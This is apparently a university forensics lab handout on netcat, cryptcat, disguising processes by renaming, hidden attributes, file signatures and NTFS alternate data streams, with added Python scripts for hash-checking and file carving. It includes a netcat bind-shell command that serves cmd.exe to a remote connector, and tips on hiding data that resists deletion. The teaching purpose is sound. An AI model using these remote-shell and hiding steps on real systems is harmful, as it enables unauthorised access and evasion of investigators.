
TP 1 Forensic

Netcat Tutorial
netcat (netcat/nc.exe in the Windows partition on your laptops) is the Swiss Army
Knife of networking. It is a simple tool (originally UNIX, then ported to Windows)
that reads and writes data across a network connection, using either TCP or UDP.

-d        detach from console
-e prg    execute inbound program
-l        listen mode (waiting for inbound connections)
-L        listen mode (relisten on socket close)
-n        numeric IP addresses only
-o file   hexadecimal dump of traffic
-p port   local port number
-u        UDP mode (TCP is default)
-v, -vv   verbose mode

Table 1: Netcat Command List (www.atstake.com/tools)

Monitor all network traffic with Ethereal. Use the Ethereal help to find a filter so
that you only read traffic to and from your own machine. (Not because of privacy
issues, but because you do not want to get overwhelmed with too much data.)

Remote Program Execution

Divide yourselves into groups of two laptops. In this exercise we remotely control
another computer. To get netcat to listen on port 666, type
nc -L -p 666 -e cmd.exe

This tells netcat to listen (really hard, i.e. multiple times) on port 666 and, when
someone connects to this port, to execute cmd.exe. On the (attacking) computer,
execute the program
nc -v -n 10.0.0.14 666

This lets netcat connect to computer 10.0.0.14 on port 666. (Of course, you'll
probably have to change the IP address.) To show that you connected to the other
computer, create a small file.

File Transfer
Netcat can be used to transfer data from a suspect machine to the forensic machine.
Designate your two machines.

In the directory foundstone, you find a set of interesting tools. Foundstone\fport lists
which programs are using which ports. For this exercise, we are going to transfer the
output of fport from the suspect machine to the forensic machine. (Notice that in real
life you would want to run a trusted copy of fport from a USB thumb drive, but here
we are trusting the built-in fport.)

First, we set up the forensic machine to listen.

nc -l -p 666 > results

Then we send the data from the suspect machine. (Maybe you want to set up a few
more netcat listening connections there so that fport gives more interesting results.)

Foundstone\fport | nc 10.0.0.14 666

We close the connection with Control-C and should now have the output of fport in
the results file on the forensic machine.

Cryptcat
By looking at the results in Ethereal, you find that the transferred data is readable.
Therefore, you will sometimes want to use cryptcat instead. Redo the exercise with
cryptcat, which is also already on your computer.

In general, you want to install as many of the tools we use in the labs as possible on
your private computer. Try to experiment with them.

Data Hiding
Renaming
One of the easiest ways to hide a program is to rename it. For example, find the file
inetinfo.exe and make a copy of it for restoration. (If you do not restore the file, then
you are subject to academic penalties possibly involving flogging and burning at the
stake.) Actually, pretend that you are using inetinfo.exe (normally associated with
the IIS web server) by calling it ine1info.exe. Copy nc.exe to ine1info.exe and set
it up as a listener. Now execute fport. Can you tell that nc is actually running?

Malware like Backdoor.XTS and Spyware.SpyTech use the filename svchost.exe,
because a number of svchost.exe processes are always running.
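As an added example (not part of the handout), here is the check a forensic analyst makes instead of trusting the names fport prints: hash the image file of each listening process and look the digest up in a reference table built from trusted copies. The fport-style listing, the reference table and the stand-in binaries are all constructed here; check_listeners and demo are names chosen for this illustration.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Hash a file on disk; the digest identifies the binary whatever it is named."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_listeners(listing, reference):
    """listing: fport-style rows (process name, port, path of the image on disk).
    reference: sha256 hex -> canonical tool name, computed from trusted copies.
    Returns the rows whose on-disk name disagrees with what the hash says it is."""
    mismatches = []
    for name, port, path in listing:
        real_name = reference.get(sha256_of(path))
        if real_name is not None and real_name.lower() != name.lower():
            mismatches.append((name, port, real_name))
    return mismatches


def demo():
    """Rebuild the handout's scenario with constructed stand-in files (not real PEs)."""
    workdir = tempfile.mkdtemp()

    def write(name, body):
        path = os.path.join(workdir, name)
        with open(path, "wb") as fh:
            fh.write(body)
        return path

    nc_body = b"MZ constructed stand-in for nc.exe"
    nc = write("nc.exe", nc_body)
    renamed = write("ine1info.exe", nc_body)        # same bytes under a new name
    inetinfo = write("inetinfo.exe", b"MZ constructed stand-in for inetinfo.exe")
    # Reference digests come from the trusted copies, never from the suspect listing.
    reference = {sha256_of(nc): "nc.exe", sha256_of(inetinfo): "inetinfo.exe"}
    # What fport would report: the renamed netcat listening on port 666.
    listing = [("inetinfo.exe", 80, inetinfo), ("ine1info.exe", 666, renamed)]
    return check_listeners(listing, reference)


if __name__ == "__main__":
    for name, port, real_name in demo():
        print(f"{name} on port {port} is really {real_name}")
```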

The Hidden Attribute

The hidden attribute prevents a file from being seen with Windows Explorer, unless
of course the Folder Options dialogue (under Tools in Windows Explorer) is set so
that hidden files are shown. If you use the dir command, you can specify the /ah
switch. attrib will also display file attributes. Create and hide a file in the My
Documents folder and show how easy it is to find anyway with dir and Windows
Explorer. Then delete the file.

File Signatures
Most file types contain a file signature at the very beginning of the file. Go to the
internet and download a number of different files into a folder named Temp. (If you
forget to delete the folder afterwards, bad things might occur.) Use WinHex to look
at the hexadecimal contents of each file. You will find that many different file types
have a so-called signature at the very beginning. Find the codes for .jpg, .pdf, .gif,
.wav and a few other extensions.

NTFS Hidden Streams

NTFS streams allow us to store more than a single file under the same name. Create
a folder temp. (If one already exists, remove all its contents.) In the temp folder we
first create a file and then a stream.
c:\temp> echo "This is a file" > file.txt

c:\temp> echo "This is another file" > file.txt:hiddenstream.txt

Now try to find the second file. You cannot find it, but you can use it.
c:\temp> notepad file.txt:hiddenstream.txt

To discover an alternate data stream (ADS), we need to use the BackupRead() and
BackupSeek() API calls that older tools do not use. However, there are a number
of tools available: SFind from Foundstone (on the computer), Streams.exe from
Sysinternals (if you feel like downloading that, go ahead, and place it next to the
Foundstone directory under SysInternal), lads.exe, etc.
Getting rid of an ADS without destroying the original file is difficult. One can copy
the file to a FAT file system, which would get rid of it, or one can run the file through
ftp. However, all of this becomes more tedious if we associate an ADS with a
directory:
c:\temp> echo "This is a file" > :ads.txt

We can also attach the ADS to a file protected by Windows File Protection, which
would make it nearly impossible to delete.

Merge Streams
Merge Streams is an interesting utility for hiding Word documents. You might
consider installing the utility and trying it out at home. We can't do it here because
we have no installation of Word.

WinHex Analysis of a Floppy Drive

Use your skills with file signatures to find the images, PDF documents and Word
documents hidden on the floppy disk. The FTK image in dd format is here.
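As an added example (not from the handout), this Python script applies the signatures from the File Signatures exercise to a raw dd image: it searches for each magic sequence, re-checks the full header (a RIFF block is only a WAV if "WAVE" follows at offset 8) and reports the offset and type of every file it finds. The floppy-like image is constructed inline; on the real FTK image you would pass the bytes of the dd file to carve() instead.

```python
# Well-known signatures for the types the handout asks you to look up.
SIGNATURES = {
    "jpg": b"\xff\xd8\xff",   # JPEG start-of-image marker
    "pdf": b"%PDF-",
    "gif": b"GIF8",           # GIF87a or GIF89a
    "wav": b"RIFF",           # RIFF container; only a WAV if "WAVE" follows at offset 8
}


def identify(header):
    """Return the type of a file whose first bytes are `header`, or None."""
    if header.startswith(b"\xff\xd8\xff"):
        return "jpg"
    if header.startswith(b"%PDF-"):
        return "pdf"
    if header[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if header[:4] == b"RIFF" and header[8:12] == b"WAVE":
        return "wav"
    return None


def carve(image):
    """Return (offset, type) for every header in a raw image; identify() re-checks each hit."""
    hits = []
    for kind, magic in SIGNATURES.items():
        pos = image.find(magic)
        while pos != -1:
            if identify(image[pos:pos + 12]) == kind:   # drops e.g. RIFF/AVI decoys
                hits.append((pos, kind))
            pos = image.find(magic, pos + 1)
    return sorted(hits)


def build_sample_image():
    """Constructed floppy-like image: eight 512-byte sectors with headers dropped in."""
    image = bytearray(512 * 8)
    def place(offset, data):
        image[offset:offset + len(data)] = data
    place(512 * 1, b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")         # JPEG
    place(512 * 2, b"RIFF\x64\x00\x00\x00AVI LIST")             # decoy: RIFF but not WAV
    place(512 * 3, b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n")            # PDF
    place(512 * 4 + 17, b"GIF89a" + bytes(7))                   # GIF, not sector aligned
    place(512 * 6, b"RIFF\x24\x00\x00\x00WAVEfmt ")             # WAV
    return bytes(image)


if __name__ == "__main__":
    for offset, kind in carve(build_sample_image()):
        print(f"offset {offset:6d} (sector {offset // 512}): {kind}")
```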
